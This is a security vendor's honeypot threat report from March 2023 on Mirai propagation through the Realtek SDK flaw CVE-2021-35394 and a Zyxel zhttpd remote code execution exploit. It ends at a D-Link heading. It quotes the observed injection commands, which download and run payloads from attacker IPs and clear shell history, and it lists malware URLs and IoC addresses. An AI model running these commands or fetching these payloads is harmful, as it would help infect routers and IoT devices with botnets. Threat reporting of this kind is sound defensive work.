Our selection of alerts on honeypots: report 5 – march 2023

A good understanding of active threats is necessary to achieve a good security posture.  The following report provides actual trends that emerge from the Internet Background Noise. The data are provided using two weeks of our Honeypots logs.

Exploit of Realtek SDK vulnerability to propagate Mirai botnet

A command injection vulnerability was discovered in 2021 affecting some versions of Realtek Jungle SDK and allowing an unauthenticated attacker to execute arbitrary commands on the affected system. This vulnerability is tracked as CVE-2021-35394 and has a CVSSv3 score of 9.8 (critical).

Realtek microchips are sold and included in various IoT products and routers from different manufacturers all over the world.

These past couple of weeks, a surge in exploit attempts of CVE-2021-35394 has been observed on our honeypots with the aim of propagating the Mirai botnet, a self-replicating and automated malware.

22 IP addresses conducted these exploit attempts, targeting servers located in Pacific Asia and in Europe (see IoCs below). 80% of these exploit attempts come from IP addresses registered in the US, 6% in the Emirates and 5% in Vietnam. Almost 80% of the requests came from AS211252 Delis LLC.

If the exploit is successful, the attacker uses the following request:

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget <URL>; chmod 777 *; sh <filename1>; tftp -g <IP address> -r <filename2>; chmod 777 *; sh <filename2>; rm -rf *.sh; history -c

This aims at:

• Attempting to go either to tmp, /var/run, /mnt, /root or /
• Downloading <filename1> form the dedicated URL and executing it from basic shell
• Downloading and executing <filename2>
• Cleaning the temporary file and the local history

The files in question are variants of Mirai.

Below are the URLs to retrieve the malware files contained in the web requests observed on our honeypots:

URL contained in the web request	Additional information
http[:]//87.251.67[.]57/EkSgbins.sh http[:]//103.186.147[.]155/bins/mips http[:]//94.232.46[.]201/Sakura.sh http[:]//46.3.112[.]133:808/download.sh http://104.244.72.8/jack5tr.sh http[:]//170.64.182[.]9/bins/void.mpsl http[:]//45.154.3[.]16/mpsl http[:]//46.3.112[.]143/download.sh http[:]//46.3.112[.]162/download.sh http[:]//195.133.40[.]248/mpsl http[:]//111.92.242[.]146/mpsl	–
http[:]//107.189.13[.]143/download.sh http[:]//143.198.217[.]16/bins/mpsl http[:]//45.148.116[.]40/bins/mips http[:]//47.87.241[.]156/bins/kgf.mips http[:]//84.54.50[.]104/mips http[:]//79.137.198[.]58/hiddenbin/boatnet.mips http[:]//79.137.198[.]58/hiddenbin/boatnet.x86_64	These URL are known for downloading a Linux variant of Mirai.
http://43.139.138[.]38/mpsl http://109.206.240[.]148/bins/mp http[:]//64.93.80[.]146/mpsl http[:]//109.206.240[.]231/binS/botx.mpsl	Down at the time of writing

These large-scale attacks are a concern for organizations, since IoT and routers are often looked over when it comes to cybersecurity. These detections align with the cybersecurity community’s recent observations of a global surge of attacks on Realtek products.

To prevent such attacks, it is important to apply vendor’s updates as soon as they are available. A security tool such as TEHTRIS NTA will help you detect any compromission of your devices.   

IoCs – IP addresses

• 109.206.240[.]231
• 185.117.74[.]19
• 103.90.160[.]10
• 103.180.147[.]228
• 84.54.50[.]104
• 14.225.254[.]162
• 109.206.240[.]9
• 107.189.12[.]152
• 178.128.25[.]126
• 167.172.175[.]228
• 185.225.73[.]104
• 107.189.29[.]121
• 185.221.162[.]49
• 107.189.1[.]237
• 193.35.18[.]109
• 170.64.174[.]2
• 194.87.151[.]204
• 178.128.122[.]209
• 194.113.194[.]43
• 77.91.78[.]10
• 45.128.232[.]11
• 87.121.221[.]104

Exploit of RCE vulnerability in Zyxel product

A high-risk vulnerability, disclosed at the end of 2020, affects Zyxel products and allows a remote attacker to execute arbitrary code. The vulnerability is due to an inadequate handling of HTTP requests in the zhttpd webserver. Zyxel is a Taiwanese manufacturer of modems, network switches, routers and Wi-Fi access points, among other things.

Threat actors still rely on this exploit and scan the internet for vulnerable devices. Over the past couple of weeks, a unique web request coming from over 80 IP addresses has been observed:

/bin/zhttpd/${IFS}cd${IFS}/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http[:]//163.123.143.126/x.sh;${IFS}sh${IFS}x.sh;

The attacker aims at deleting what is in the tmp file and downloading then executing x.sh binary from URL http[:]//163.123.143[.]126/x.sh.  The file is very likely SHA256 945196525c4b0a14709f68b2751811d3991265c22d5018b5941207414f95985d, seen for the first time in December 2022 and potentially associated with Linux Medusa botnet. Medusa botnet has been around for years, and a new variant has been spotted in the wild and is based on a Mirai botnet leaked source code.

1/4^th of the exploit attempts came from IP addresses registered in China, and the other top countries of origin were India, Ukraine, Sweden and Australia.  

To prevent a Zyxel device to be added to a botnet, you should update versions as soon as the vendor releases patches.

Exploit D-Link routers (with IoCs – IP addresses)

---